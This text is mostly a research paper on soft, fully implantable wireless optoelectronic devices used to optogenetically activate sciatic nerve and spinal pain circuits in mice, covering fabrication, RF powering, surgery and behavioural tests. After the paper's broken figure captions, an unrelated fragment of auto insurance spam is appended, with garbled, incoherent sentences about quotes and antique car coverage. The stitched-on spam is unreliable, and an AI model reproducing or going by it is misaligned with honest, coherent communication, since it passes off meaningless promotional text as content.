Here we present miniaturized, soft wireless optoelectronic systems with versatile layout options that are fully compatible with advanced methods for mass production in semiconductor device manufacturing and capable of complete, minimally invasive implantation over multiple neural interfaces. The low modulus mechanics of these biocompatible devices allows their implantation as thin appliques and/or soft injectable filaments, without the need for skeletal fixation, thereby permitting experiments in regions that would be otherwise impossible. We demonstrate that these devices can specifically and reversibly activate both peripheral and spinal pain circuits in freely behaving, untethered mice. Detailed chronic studies and histological evaluations show the essential benefits of soft, compliant and fully implantable device technologies of this type.
The miniaturized wireless optoelectronic systems are composed of a radio frequency harvesting unit that receives signals from a transmitter, rectifies them, multiplies the voltages, and routes the resulting direct-current output to the LEDs (a turn-on voltage of 2.7 V, 470 nm wavelength). The antenna and LEDs are connected with serpentine Ti/Au electrical interconnects, and the circuit is encapsulated by polyimide (40 μm width, 3 μm thickness) and a low modulus silicone elastomer (\~0.5 MPa, 100 μm thickness). This process yields soft, system-level mechanics (effective modulus of \~1.7 MPa) capable of accommodating anatomical shapes and natural motions.^[@R6]--[@R9]^ A schematic view of a completed system appears in [Fig. 1a](#F1){ref-type="fig"}. [Supplementary Note 1](#SD1){ref-type="supplementary-material"} and [Supplementary Fig. 1--3](#SD1){ref-type="supplementary-material"} provide details of the components and the circuit layouts, as well as the electrical and mechanical characteristics. Fabrication steps and equipment are detailed in [Supplementary Table 1](#SD2){ref-type="supplementary-material"} and **Online Methods**.
The mechanical compliance, miniaturized geometry (0.7 mm × 3.8 mm × 6 mm), and lightweight construction (16 mg) of these devices enables implantation into anatomical regions that were previously inaccessible due to physical constraints. In comparison with previous technology, these devices are significantly thinner, softer, and more flexible ([Supplementary Note 1](#SD1){ref-type="supplementary-material"}).^[@R8],[@R10],\ [@R11]^ Here, we illustrate the deployment of these devices underneath muscle for optogenetic stimulation of a peripheral nerve ([Fig. 1b](#F1){ref-type="fig"}), and in the epidural space for optogenetic control in the spinal cord ([Fig. 1c](#F1){ref-type="fig"}). Peripheral nerve illumination is achieved with a soft applique that is implanted with the antenna in a subcutaneous pocket with an LED extension that traverses under the gluteus maximus to the sciatic nerve. The distal extension with the LEDs includes wings (1 mm × 3 mm) that anchor the LED tip in the gluteal pocket once the muscular architecture has been repaired with suture ([Fig. 1b, d, f](#F1){ref-type="fig"}). Spinal illumination is achieved by implantation under the vertebra in the epidural space, which is accessed by laminectomy of the T13 spinous process ([Fig. 1c, e, g](#F1){ref-type="fig"}). This placement centers the narrow part of the device (380 μm × 8 mm) over the lumbar spinal cord.
The key to miniaturizing these devices is a stretchable antenna that harvests RF power through capacitive coupling between adjacent serpentine traces ([Supplementary Fig. 4](#SD1){ref-type="supplementary-material"}), thereby lowering the resonant frequency and therefore the dimensions of the antenna.^[@R12]^ For operation at 2.34 GHz, this design requires an area of only 3 × 3 mm, a 100-fold reduction in volume and weight compared to conventional rigid antennas.^[@R8]^ This antenna also features a wide bandwidth, which is essential for reliable activation of the devices since the center frequency of the receiving antenna must be similar to that of the transmitting antenna to efficiently harvest transmitted power. The center frequency describes the frequency range where an antenna absorbs energy most effectively and corresponds to the range of frequencies that minimize the scattering parameter (S~11~). A lower S~11~ indicates that less incident energy is reflected off the antenna and therefore more of that energy is absorbed. The wide bandwidth (200 MHz) of the stretchable antenna allows it to harvest RF power from a much wider range of transmitting frequencies than conventional patch antennae (bandwidth of 50 MHz) ([Supplementary Fig. 4d](#SD1){ref-type="supplementary-material"}). This characteristic reduces the likelihood that a mismatch between the receiver and transmitter will prevent device activation. The S~11~ and center frequency in these devices are also affected by the physiological environment, which is detailed in [Supplementary Note 2](#SD1){ref-type="supplementary-material"} and [Supplementary Fig. 5](#SD1){ref-type="supplementary-material"}.
The capacitive coupling that powers these devices can be diminished if strain deforms the metallized traces and increases the sizes of the gaps between them. To assess the reliability of these antennae under biological strain, we modeled and tested performance under worst-case scenarios (30 % strain) ([Fig. 2a--b](#F2){ref-type="fig"}, [Supplementary Fig. 5](#SD1){ref-type="supplementary-material"}). Simulations show that while uniaxial strains of \~10 % increase the gap size in the direction of the strain, they reduce the gap size in the orthogonal direction by up to 50 % ([Supplementary Fig. 6](#SD1){ref-type="supplementary-material"}). As a result, the decrease in coupling due to increased gap size is balanced by enhanced coupling in the orthogonal direction, such that the harvesting efficiency of the antenna is largely unaffected ([Fig. 2a--b](#F2){ref-type="fig"}).
While strain does not alter the efficiency of capacitive coupling, it does shift the center frequency of the antenna toward lower frequencies ([Fig. 2a--b](#F2){ref-type="fig"}). However, the magnitudes of the strain-induced shifts in the center frequency are small compared to the large bandwidth ([Supplementary Fig. 4d](#SD1){ref-type="supplementary-material"}), such that the net result of supraphysiological strain application is a 12 % decrease in coupling efficiency due to center frequency shifts ([Fig. 2a, b](#F2){ref-type="fig"} middle). This translates to a modeled optical power output decrease of only a few percent, suggesting that physiological strain is unlikely to significantly impair device function ([Fig. 2a, b](#F2){ref-type="fig"} right). This modeling is confirmed by examples of devices functioning reliably under deformation significantly exceeding that expected in animals ([Supplementary Fig. 7](#SD1){ref-type="supplementary-material"}). Additionally, images and a movie of a mouse with a device interfaced to the sciatic nerve while running ([Supplementary Fig. 8](#SD1){ref-type="supplementary-material"}, [Supplementary Movie 1](#SD1){ref-type="supplementary-material"}) and a picture of successful wireless operation 6 months after implantation ([Fig. 1f](#F1){ref-type="fig"}) support that these devices function reliably under physiological strain.
In addition to physical strain, other concerns for long-term implantation of electrical devices in animals include heat generation and long-term durability. Infrared imaging of an anesthetized mouse during device operation reveals that an optical power density of 10 mW/mm^2^ (40 % duty cycle; 20 Hz period; 20 ms pulse width) does not cause detectable temperature changes ([Fig. 2c](#F2){ref-type="fig"}). Experimental studies using implantable thermal sensors show similar trends ([Supplementary Fig. 9](#SD1){ref-type="supplementary-material"}, [Supplementary Note 3](#SD1){ref-type="supplementary-material"}). Studies also show that exposure to biological conditions does not significantly alter device operation or durability; devices retain full functionality for 2 months when immersed in 37 °C saline, and for 6 days in saline at supraphysiological temperatures (90 °C) ([Fig. 2d](#F2){ref-type="fig"}). In terms of mechanical stability, these devices can be cycled \>10^5^ times without a detectable loss in optical power ([Fig. 2e](#F2){ref-type="fig"}). The robustness suggested in these *in vitro* assays is reinforced by the fact that 76 % (31/41) of devices that were implanted for use in this work were still functional after 1 week in the animals. Two sciatic nerve devices retained reliable activation at least every month for 6 months after implantation, and of five sciatic nerve devices where reimplantation in new host mice after initial removal was attempted, three remained functional for 3 weeks after reimplantation. All of these observations suggest that heat generation, hydration effects, and durability are not obstacles for the use of these devices in animals.
For the devices to be useful in behavior experiments, the RF transmission (TX) systems must enable continuous operation throughout a location of interest (e.g., the homecage or testing arena), at field strengths that lie below IEEE and FCC guidelines. A configuration of four TX antennas connected to a common RF power supply ([Fig. 2f](#F2){ref-type="fig"}) provides total average RF power that is sufficient for operation (\~2 W) throughout the volume of the cage, and is capable of activating multiple devices in the same region ([Fig. 2g](#F2){ref-type="fig"}). These devices can be activated reliably up to 20 cm from the transmitters, which is 10 times the reported range of any previous systems^[@R8],\ [@R11]^ ([Supplementary Fig. 10](#SD1){ref-type="supplementary-material"}). Under these conditions, calculated distributions of the specific absorption rate (SAR; a measure of the rate at which RF energy is absorbed by the body) reveal that the SAR falls well below safety guidelines.^[@R13]^ This configuration allows consistent device activation even with rapid changes in receiver location and orientation ([Fig. 2h--j](#F2){ref-type="fig"}). This is demonstrated using long-exposure images captured during motion of an operating device; continuous streaks of light illustrate activation of the devices regardless of device position or orientation ([Fig. 2i--j](#F2){ref-type="fig"}). Further discussion of the transmission efficiency with moving animals can be found in [Supplementary Notes 4--5](#SD1){ref-type="supplementary-material"} and [Supplementary Fig. 10--12](#SD1){ref-type="supplementary-material"}.
To determine the utility of these optoelectronic devices in studies of pain pathways, we test whether they can modulate pain-related behaviors of mice expressing ChR2 in all sensory neurons or in subpopulations of sensory neurons responsible for detection of noxious stimuli (nociceptors). Mice expressing ChR2 in all sensory neurons were generated using a cre recombinase-based transgenic approach where cre recombinase expression is driven by the promoter of the sensory neuron-specific gene Advillin (Advillin-ChR2; [Fig. 3a](#F3){ref-type="fig"}).^[@R14],\ [@R15]^ Electrophysiological studies show that Advillin-ChR2 sensory neurons can be consistently activated by blue light ([Fig. 3b--c](#F3){ref-type="fig"}, [Supplementary Note 7](#SD1){ref-type="supplementary-material"}), and immunohistochemical studies demonstrate that ChR2 is present in mid-axon, in the DRG, and in the central terminals of sensory neurons ([Fig. 3d--f](#F3){ref-type="fig"}, [Supplementary Note 8](#SD1){ref-type="supplementary-material"}). Similar results are observed in mouse lines where ChR2 expression is restricted to nociceptor populations (TrpV1-ChR2, SNS-ChR2; see [Supplementary Notes 6--8](#SD1){ref-type="supplementary-material"}, [Supplementary Fig. 13--17](#SD1){ref-type="supplementary-material"}). Detailed electrophysiological characteristics of TrpV1-ChR2 dorsal root ganglion neurons can be found in [Supplementary Table 2](#SD1){ref-type="supplementary-material"}.
Previous studies have shown that illumination of peripheral nerve terminals using an external light source on the skin induces spontaneous pain behaviors and place aversion in mice expressing ChR2 in sensory neurons.^[@R1],\ [@R3]^ For these implantable devices to be viable for *in vivo* pain studies, illumination of ChR2-expressing axons (shown schematically in [Fig. 4a](#F4){ref-type="fig"}) must generate action potentials. Consistent with this hypothesis, fiber-optic laser illumination of the exposed sciatic nerve in TrpV1-ChR2 mice produces reflexive withdrawal behaviors ([Supplementary Fig. 18](#SD1){ref-type="supplementary-material"}). It is also critical that device implantation not induce nerve injury or impair function. Devices implanted over the sciatic nerve for two weeks produce no signs of injury and no infiltration of immune cells compared to the contralateral nerve ([Supplementary Fig. 19--20](#SD1){ref-type="supplementary-material"}), and produce no motor impairment, even when running ([Supplementary Movie 1](#SD1){ref-type="supplementary-material"}). This is quantified using the accelerating rotarod and open field tests (OFT), indicating that the devices do not alter balance, motor coordination, or locomotor activity compared with sham controls ([Fig. 4b](#F4){ref-type="fig"}, [Supplementary Fig. 21](#SD1){ref-type="supplementary-material"}).
Devices implanted over the sciatic nerve in Advillin-ChR2 mice generate robust nocifensive responses. Wireless powering (20 Hz, 2.34 GHz RF, 3--5 dBm) of these devices produces reversible nocifensive behaviors in Advillin-ChR2 mice, but not in cre-negative littermates ([Fig. 4c](#F4){ref-type="fig"}). These spontaneous responses are consistent with nociceptor activation. To evaluate whether optogenetic peripheral neuron activation produces behavioral aversion consistent with the perception of ongoing pain (as opposed to representing reflex activation), we place mice in a modified Y-maze apparatus where one arm is exposed to a curtained RF (LED-ON) and one arm (LED-OFF) is not ([Fig. 4d](#F4){ref-type="fig"}). Pre-testing of devices in this arena demonstrates that activation occurs only in the LED-ON arm. Advillin-ChR2 mice demonstrate significant aversion to the LED-ON arm compared to the LED-OFF arm ([Fig. 4e--f](#F4){ref-type="fig"}), while cre-negative littermates spend a similar amount of time in the two arms. Similarly, TrpV1-ChR2 mice, which express ChR2 only in nociceptors, demonstrate significant aversion to the LED-ON arm compared to the LED-OFF arm ([Fig. 4e--f](#F4){ref-type="fig"}).
With the epidural devices, we demonstrate optogenetic modulation of the spinal terminals of peripheral nerves using LED devices that are inserted in the epidural space ([Fig. 4g](#F4){ref-type="fig"}). Implantation of devices into the epidural space does not cause significant damage to the spinal cord as demonstrated histologically ([Supplementary Fig. 22](#SD1){ref-type="supplementary-material"}). Epidural device implantation also produces no impairment in motor behavior, locomotion, or coordination compared to sham controls in the accelerating rotarod and OFT ([Supplementary Fig. 21](#SD1){ref-type="supplementary-material"}). Activation of these devices (20 Hz, 2.24 GHz RF, 3--5 dBm) in the epidural space of SNS-ChR2 mice generates robust and reversible nocifensive behaviors that are entirely absent in cre-negative littermates ([Fig. 4h](#F4){ref-type="fig"}). A Y-Arm maze assay to quantify behavioral aversion using SNS-ChR2 mice with epidural implants demonstrates robust aversion to the LED-ON arm compared to littermate cre-negative mice ([Fig. 4i--j](#F4){ref-type="fig"}).
The miniaturized, fully implantable, thin and soft optoelectronic systems we introduce here enable robust operation and large transmission range without the need for optimization around specific cages or animal body types. The platforms are thinner by a factor of 5, more stretchable by a factor of 10, softer by a factor of 10,000, and more flexible by a factor 10,000,000 than alternative technologies, thereby providing unique features in a wide variety of optogenetic applications. The low modulus of these biocompatible devices permits experiments in body regions that would be impossible to perform with other approaches and in a chronic manner, bypassing constraints associated with the hard mechanics and thick volumetric layouts of the most recently reported fully implantable designs.^[@R10]^
Providing easy access to this technology to the broader scientific community is essential to facilitate improved studies of neuronal circuitry. Our devices can be fabricated with 10 hours of effort using standard laboratory facilities using inexpensive commercially available components and the external power transmission systems requires less than 1 hour of training, making it possible for independent labs to construct and operate their own variants. While the hand-crafted approach to device fabrication needed for other approaches^[@R10]^ offers some advantage in customization, it has limited potential to take advantage of increasingly powerful manufacturing approaches and accelerating trends in size miniaturization that drive progress in conventional optoelectronics. In contrast, our fabrication process is compatible with established flexible printed circuit board technologies and manufacturing tools from the electronics industry, making it possible to construct large numbers of devices in a cost effective manner.
Extension of our approach to multiple LEDs could enable optogenetic modulation of the whole brain or other whole organs. Laminated films with high thermal conductivity could improve the efficiency of heat dissipation, and optical diffusers could yield spatially uniform illumination. These advanced forms, as well as the present designs, have potential not only for basic research, but also as clinical tools. Gene therapy that could be used to deliver optogenetic channels to human cells is already in clinical trials^[@R16]--[@R20]^, and with the appropriate testing these optogenetic stimulators could be adapted for use in treating chronic intractable human diseases such as chronic pain.
Online Methods {#S1}
==============
For all mouse studies, institutionally approved protocols are followed for all aspects of this study.
Device design and fabrication {#S2}
-----------------------------
The harvesting unit receives signals from a transmitter, rectifies them, multiplies the voltages (3x) and routes the resulting direct-current output to the LEDs. The harvesting unit is an impedance matching circuit consisting of a ceramic chip capacitor (1 pF; 0.20 mm width, 0.4 mm length, 0.22 mm thickness; bonded by solder paste) and an inductor (2.7 nH; 0.20 mm width, 0.4 mm length, 0.22 mm thickness; bonded by solder paste) connected in series. The rectifier uses miniaturized Schottky diodes (1.7 mm width, 1.5 mm length, 0.5 mm thickness) and ceramic chip capacitors (5 pF; 0.20 mm width, 0.4 mm length, 0.22 mm thickness; bonded by solder paste). The multiplier includes three Schottky diodes identical to those in the rectifier, and boosts voltages provided by the rectifier (\~0.9 V) to values sufficient to operate the LEDs (\~2.7 V; 220 μm width, 270 μm length, and 50 μm thickness for spinal device; 1.6 mm length, 0.8 mm width, and 0.75 mm for peripheral devices).
Fabrication begins with a clean glass slide (75 mm long, 50 mm width, and 1 mm thickness), with a layer (200 nm thickness) of polymethyl methacrylate (PMMA, 495 PMMA A6, Microchem) and a 2 μm layer of polyimide (PI) formed by spin-casting at 3000 rpm for 60 seconds, cured at 250 °C for 2 hours. Photolithography (AZ 4620, AZ Electronic Materials) defines the necessary conducting traces after e-beam deposition of Ti/Au (3 μm thickness). A second 2 μm PI layer serves as encapsulation for making a mechanically neutral plane. Photolithography and reactive ion etching then define the PI/metal/PI layers into serpentine-shaped structures. The LED and circuit chips are placed onto the exposed pads ([Supplementary Fig. 1](#SD1){ref-type="supplementary-material"}) with a small amount (5\~20 particles) of solder paste (SMD290SNL250T5, Chipquik). The substrate is then cured at 250 °C in a vacuum oven for 10 minutes to electrically bond the LEDs and the SMD components to the conductive traces. An encapsulating layer of PDMS, spin-cast and cured at 70 °C for 1 hour seals the device prior to its release from the substrate by dissolution of the PMMA in acetone. For the epidural device, the narrow serpentine area (\~360 μm width) and LED are inserted into a Teflon tube (PTFE-28-25, SAI), with an inner diameter of 380 μm. PDMS is added to the tube. The devices is cast and cured in the tube, which is then removed to complete the fabrication. The timing and steps required for device fabrication are detailed in [Supplementary Table 1](#SD2){ref-type="supplementary-material"}.
Configuration: RF system for power transmission {#S3}
-----------------------------------------------
The RF transmission system consists of a signal generator (N5181 MXF, Agilent), a power amplifier (1189/BBM3K5KKO, Richardson RFPD), a DC power supply (U8031A, Keysight Technologies) with a heat sink (53M7972, Fischer Elektronik), and TX antennas (PE51019-3, Pasternack Enterprises) with a splitter (RFLT4W0727GN, RFLambda). The amplifier and the fan are powered by separate DC power supplies. The outputs (channels 1 & 2) connect to the J3 input of the amplifier, with VDD into Pins \#6, 7 and GND into Pins \#8, 9 and to the fan, respectively. The output of the signal generator connects to the input of the amplifier, which is connected to the splitter to output to all of the TX antennas.
Animals and Genetic Strategy {#S4}
----------------------------
Adult mice (8--12 weeks of age) are utilized for this study. Mice are housed in the animal facilities of the Washington University School of Medicine on a 12 hour light/dark cycle, with access *ad libitum* to food and water. Institutionally approved protocols are followed for all aspects of this study.
Three Cre-driver lines are used for this study including heterozygous SNS-Cre mice from Rohini Kuner^[@R21]^, heterozygous TrpV1-Cre mice from Mark Hoon^[@R22]^, and heterozygous Advillin-Cre mice provided by Fan Wang.^[@R14]^ Mice from each of these three lines are crossed to homozygous Ai32 mice from Jackson Laboratory. As previously described, Ai32 mice harbor ChR2 (H134R)-eYFP in the Gt(ROSA)26Sor locus.^[@R23]^ To generate mice with conditional expression of ChR2 in specific populations of sensory neurons, mice with ChR2 in the Rosa locus (Ai32 mice) are crossed to mice expressing cre from various sensory neuron-specific driver gene loci (Advillin, TrpV1, or SNS). For the purposes of this study, the three lines generated are referred to as Advillin-ChR2, TrpV1-ChR2, and SNS-ChR2, respectively.
Surgical Procedure: Sciatic Device Implantation {#S5}
-----------------------------------------------
The surgical procedure was modified from the Chronic Constriction Injury procedure.^[@R24]^ Mice are anesthetized with isoflurane and their eyes are covered with Altalube ointment (Altaire Pharmaceuticals, Riverhead, NY) to prevent corneal drying. A small skin incision is made over the greater trochanter of the femur on the left flank of the animals. The fascia connecting the biceps femoris and the gluteus maximus is blunt dissected apart to open a plane between the muscles, in which the sciatic nerve is clearly accessible. The fascia connecting the underlying muscle in the area directly rostral to the incision is blunt dissected apart using needle driver forceps. The body of the device is inserted under the skin into the subcutaneous pocket generated by the blunt dissection. The gluteus maximus is pulled caudally to expose the sciatic nerve, and the tip of the device containing the LED is folded under the gluteus and placed over the nerve. The gluteus maximus is pulled over the device and sutured into place with a resorbable Ethicon 6-0 vicryl suture (Cornelia, GA) to restore the original muscle architecture, and to secure the device between the muscles and above the nerve. The left flank incision is sutured closed using Ethicon 6-0 nylon monofilament suture and the mouse is allowed to recover from anesthesia in a warmed chamber.
Surgical Procedure: Epidural Device Implantation {#S6}
------------------------------------------------
Under isofluorane anesthesia on an isothermal heating pad, a 2 cm midline incision is made on the back, exposing the thoracolumbar vertebral transition. The paraspinal muscles are separated, exposing the T13 spinous process and lamina. A partial laminectomy is made at the rostral end of this landmark level, allowing insertion of the epidural stimulator with the LEDs centered over the dorsal horn of the L4-L6 spinal cord segment.^[@R25]^ The distal end of the epidural stimulator and proximal stretchable antenna are secured with 6-0 suture. The skin is closed utilizing interrupted sutures and mice are allowed to recover on an isothermal pad with access to food and water *ad libitum*.
Surgical Procedure: Spinal Nerve Ligation (SNL) {#S7}
-----------------------------------------------
Mice are deeply anesthetized with vaporized isofluorane, and the paraspinal muscles are bluntly dissected to expose the L5 transverse process. The L5 process is removed, the L4 spinal nerve is tightly ligated with silk suture (6-0, Ethicon; Cornelia, GA) and the nerve is transected distal to the ligation. The skin is closed with staples and the animal is allowed to recover on an isothermal heating pad.
Surgical Procedure: Chronic Constriction Injury (CCI) {#S8}
-----------------------------------------------------
The procedure is performed as described previously.^[@R24]^ In brief, mice are deeply anesthetized with vaporized isofluorane and a small incision is made over the left flank. The fascial layer between the biceps femoris and gluteus maximus is bluntly dissected to expose the sciatic nerve. Two loose chromic gut sutures are tied around the nerve, which is then reseated and the muscular architecture is re-approximated on top of it. The skin is closed with interrupted sutures, and the animal is allowed to recover on an isothermal heating pad.
Direct laser activation of the sciatic nerve in an open preparation {#S9}
-------------------------------------------------------------------
Mice are anesthetized with 2% isoflurane. A small skin incision is made over the greater trochanter of the femur on the left flank of the animals. The fascia connecting the biceps femoris and the gluteus maximus is blunt dissected apart to open a plane between the muscles, in which the sciatic nerve is clearly accessible. A small cutaneous incision over the lateral leg of the mouse is made, and two silver electrodes are implanted in the exposed quadriceps muscles to amplify and record electrical activity representing muscle response. After completion of the surgical preparation, the isoflurane anesthesia is gradually reduced over 2 hrs to \~0.875 % until a flexion reflex response (evoked by pinching the paw) is present but spontaneous escape behavior and righting reflex are still absent. The animals are not restrained in any fashion. Body temperature is maintained using an overhead radiant light and monitored throughout the experiment. These conditions are optimized to establish a stable depth of anesthesia and consistent baseline sciatic muscular activity. A laser stimulus delivered through a fiber optic cable is then used to stimulate the sciatic nerve while the EMG response is recorded in real-time using a Grass CP511 preamplifier connected to a PC via a WinDaq DI-720 module. The data are exported for analysis to Igor Pro 6.05 software (Wavemetrics, Portland, OR). Using a custom script, the EMG signals are subtracted from the baseline, rectified and integrated to quantify the area under the curve. The area under the curve for the motor response is presented in arbitrary units. The investigator quantifying the motor response is blinded to testing condition.
Behavioral Analyses {#S10}
-------------------
For behavioral studies, a priori power analyses were performed to estimate necessary sample sizes. However, study results demonstrated effect magnitudes larger than anticipated, and as such, increased animal numbers could not be justified. For all behavioral analyses, the experimenters were blind to genotype and treatment (implant vs. sham). Animals from each genotype were randomly selected for implant vs. sham.
Behavior: Spontaneous Behavior {#S11}
------------------------------
Each mouse is placed in an individual plexiglass behavioral chamber. Mice are allowed to acclimate for at least 30 minutes before testing in the presence of white noise generators to reduce the influence of external noise pollution on testing. To measure spontaneous behaviors, the wireless LED devices are activated using the RF signal generator antenna at 3--5 dBm and 2.0--2.5 GHz. Behavior is recorded through an HD video camera (Sony) for one minute. Nocifensive behaviors (defined as licking hindpaws, vocalizations, or jumping) are quantified post-hoc from the video recordings while blinded to genotype.
Behavior: Y-maze {#S12}
----------------
Place aversion is tested in two arms of a Y-maze constructed of plexiglass with a layer of corn cob bedding. Each arm of the maze is 10 cm wide × 100 cm long and is marked with either vertical or horizontal black stripes with a neutral area between the arms. To generate the RF signal, one antenna is located below an arm of the maze allowing for the control of LED devices through the maze floor and a second antenna is positioned on the side of the same arm to ensure complete local field coverage. To begin the experimental protocol, a mouse is placed in the neutral area of the maze and is continuously monitored and recorded through a video connection for 20 minutes. During this time an experimenter blinded to the genotype manually controls the RF signal by watching the monitoring system. Upon entry of the mouse into the "ON" chamber, activation of the LED device through the RF antenna is initiated; likewise, upon departure from the "ON" chamber RF activation is terminated. Video data are collected and time-in-chamber is analyzed using Ethovision software (Noldus, Leesburg, VA.).
Behavior: Rotarod {#S13}
-----------------
The method for this technique has been described previously.^38,\ 39^ Briefly, an accelerating Rotarod (Ugo Basile) is utilized to study motor coordination and balance after implantation of the epidural and sciatic stimulators. Five consecutive acceleration trials are performed with 5 minute breaks separating each acceleration trial.
Behavior: Open Field {#S14}
--------------------
As described previously, locomotion is measured in a Versamax Animal Activity Monitoring System (AccuScan Instruments) Open Field Arena.^[@R26],\ [@R27]^ Mice are initially habituated to the climate-controlled test room for 1 hour before testing. Locomotor activity is assessed by recording beam breaks in this 42 (length) × 42 (width) × 30 (height) cm chamber for 1 hour. The total distance traveled during this time, time spent moving, and the number of horizontal beam breaks is calculated for the entire chamber.
DRG Culture {#S15}
-----------
Lumbar DRG are dissected from 6--8 week old Advillin-ChR2, TrpV1-ChR2 or SNS-ChR2 mice in HBSS + 10 mM HEPES on ice and digested in 45U papain (Worthington Biochemical) in HBSS+H for 20 minutes at 37 °C. The tissue is washed with HBSS+H and then further digested in collagenase (1.5 mg/mL; Sigma) for an additional 20 minutes at 37 °C. After washing, cells are dissociated in Neurobasal A media (Gibco) containing 5% FBS (Life Technologies), 1× B27 supplement (Gibco), 2 mM GlutaMAX (Life Technologies) and 100 U/mL penicillin/streptomycin (Life Technologies). The tissue suspension is then filtered using a 40 μm nylon cell strainer, and centrifuged at 1000 × g for 3 minutes, resuspended, triturated, and then centrifuged 1000 × g. Neurons are resuspended in DRG media and plated onto coverslips coated with collagen and poly-D-lysine (Sigma). Cells are cultured for 3--4 days before electrophysiology experiments.
Electrophysiology {#S16}
-----------------
Whole-cell patch clamp recordings are made from cultured DRG neurons using pipettes with resistance values ranging from 2--3 megaohms, filled with (in mM) 120 potassium gluconate, 5 NaCl, 2 MgCl~2~, 0.1 CaCl~2~, 10 HEPES, 1.1 EGTA, 4 Na~2~ATP, 0.4 Na~2~GTP, 15 sodium phosphocreatine; pH adjusted to 7.3 using KOH, osmolarity 291 mOsm. The extracellular solution consists of (in mM): 145 NaCl~2~, 3 KCl, 2 CaCl~2~, 1.2 MgCl~2~, 10 HEPES, 7 glucose; pH adjusted to 7.3 with NaOH. Recordings and light stimulation are performed using Patchmaster software (HEKA Instruments, Bellmore, NY) controlling an EPC10 amplifier (HEKA Instruments). Neurons are voltage clamped at −60 mV and held at −60 mV for current clamp recording. Optical stimulation is delivered with collimated light through the microscope objective, using a custom set-up with a blue LED (M470L2; Thorlabs) coupled to the back fluorescent port of an Olympus BX- 51 microscope. Light intensity at the focal plane (10 mW/mm^2^) is calculated using a photodiode (S120C, Thorlabs) and power meter (PM100D, Thorlabs).
Immunohistochemistry {#S17}
--------------------
Mice are deeply anesthetized with a ketamine, xylazine, and acepromazine cocktail, then transcardially perfused with cold 4 % paraformaldehyde in PBS. Lumbar DRG, spinal cord, and sciatic nerves are dissected and placed in 30 % sucrose in PBS for overnight cryoprotection, then frozen in OCT. Frozen tissue is then sectioned in a −20 °C cryostat (Leica) at either 30 μm (spinal cord and cross section sciatic nerve), 18 μm (DRG), or 6 μm (longitudinal sciatic nerve) directly onto frosted glass slides. IHC is conducted as described previously.^[@R28]^ Goat anti-CGRP (1:400, AbD Serotec Cat\# 1720-9007), rabbit anti-GFP (1:1000, Life Technologies Cat\# A11122), mouse anti-NF200 (1:400, Millipore Cat\# MAB5266), mouse anti-GFAP (1:500, Cell Signaling Technologies), rabbit anti-Iba1 (1:300, Wako Biochemicals cat\# 019-19741), goat anti-choline acetyltransferase (1:100, EMD Millipore cat\# AB144P) and mouse anti-βIII-tubulin (1:1000, Covance Research Products Inc Cat\# PRB-435P-100) are utilized while IB4+ labeling is performed using an Alexa Fluor 568-conjugated IB4 (1:400, Life Technologies Cat \#I21412). Research Resource IDs are provided below to assist the reader. Fluorescent-conjugated secondary antibodies (Life Technologies) are used to visualize primary immunostaining: donkey anti-goat AF647 (1:500), donkey anti-rabbit AF488 (1:500), and goat anti-mouse AF647 (1:500). Slides are sealed overnight with Prolong Gold Antifade Mountant with DAPI (Life Technologies). Images from sealed slides are obtained using a Leica SPE confocal microscope, with gain and exposure time constant throughout image groups.
Antibody Dilution Company Catalog ID Research Resource ID
------------------------- ---------- ----------------------------- ------------ ----------------------
Goat anti-CGRP 1:400 AbD Serotec 1720-9007 AB_2290729
Rabbit anti-GFP 1:1000 Life Technologies A11122 AB_22156
Rabbit Anti-Iba1 1:300 Wako Chemicals 019-19741 AB-839504
Mouse anti-NF200 1:400 Sigma Aldrich N0142 AB_2149763
Mouse anti-βIII-tubulin 1:1000 EMD Millipore 05-166 AB_291637
Goat anti-ChAT 1:100 EMD Millipore AB144P AB_11214092
Guinea Pig anti-GFAP 1:500 Synaptic Systems 173-004 AB_10641162
Mouse anti-GFAP 1:500 Cell Signaling Technologies 3670 AB_561049
Supplementary Material {#S18}
======================
This work was supported by an NIH Director's Transformative Research Award (NS081707) to R.W.G., J.A.R. and M.R.B. D.S.B. was supported by an NIH Ruth L. Kirschstein F31 Predoctoral Fellowship (1F31NS078852). C.D.M. was supported by a Howard Hughes Medical Institute (HHMI) Medical Research Fellowship. B.A.C. was supported by a W.M. Keck Fellowship in Molecular Medicine and TR32 GM108539. S.D. was supported by NS076324. Illustrations created by Janet Sinn-Hanlon and Payton Focken, University of Illinois. We would also like to think Dr. Bob Schmidt for his provided expertise in neuropathological examination of tissue.
**Author Contributions**
S.I.P. designed wireless optoelectronic systems, fabricated devices, tested devices, made wireless measurements, conducted simulations of wireless performance, designed experiments, generated figures, wrote and edited the manuscript. D.S.B. designed sciatic nerve devices, implanted devices, tested mice in behavior, designed experiments, performed immunostaining, generated figures, wrote and edited the manuscript. G.S. designed and fabricated spinal cord devices, tested devices, generated figures, wrote and edited the manuscript. C.D.M. designed spinal cord devices, implanted devices, tested mice in behavior, designed experiments, performed immunostaining, generated figures, wrote and edited the manuscript. B.A.C. performed immunostaining and quantification, electrophysiology experiments, generated figures. H.U.K. & K.N.N. fabricated devices and tested devices. S.D. performed experiments, implanted devices, generated figures. S.J.O., J.Y., and K.I.J. made contributions to fabrication and testing of devices.
V.K.S. performed experiments, immunostaining, generated figures. M.N. performed immunostaining and quantification of slides, as well as mouse breeding. J.G.G.R. performed experiments, generated figures. S.K.V. performed immunostaining and mouse breeding. S.S. performed immunostaining and mouse breeding. K.M.W. performed immunostaining. J.S.H. made contributions to fabrication and testing of devices. R.X., T.P., & Y.H. performed mechanical simulations of device tolerance levels.
M.C.M. designed experiments and generated figures. J.P.G. performed immunostaining, generated figures, performed behavioral experiments, and edited the manuscript. M.R.B. designed experiments. R.W.G. & J.A.R. oversaw all experiments and data analysis, designed experiments and devices, wrote and edited the manuscript.
**Competing Financial Interests Statement**
The authors declare no competing interests as defined by Nature Publishing Group, or other interests that might be perceived to influence the results and discussion reported in this paper.
{#F1}
{#F2}
{ref-type="supplementary-material"} for comparison to the ChR2 expression pattern seen in TrpV1-ChR2 and SNS-ChR2 mice which, as expected, are more restricted than in these Advillin-ChR2 mice. Scale bars = 100 μm for panels d, f, g, and 50 μm for panel e.](nihms733252f3){#F3}
{#F4}
[^1]: These authors contributed equally to this work
| mini_pile | {'original_id': '2db5a5c062ccd27bbcb46f4b74b7d0aa6cc5f08b0cb752e0bf952050c293c035'} |
Already insured?
Home Free Auto Insurance Quotes Bookmark Us
You should know that if you buy a simple question can open the doors to substantial. If you need to look at the most ethical, effective agent money can be a really low premium by the antique cars' insurance company see this as a general introduction into the brush on the road, however, was as smooth as glass.
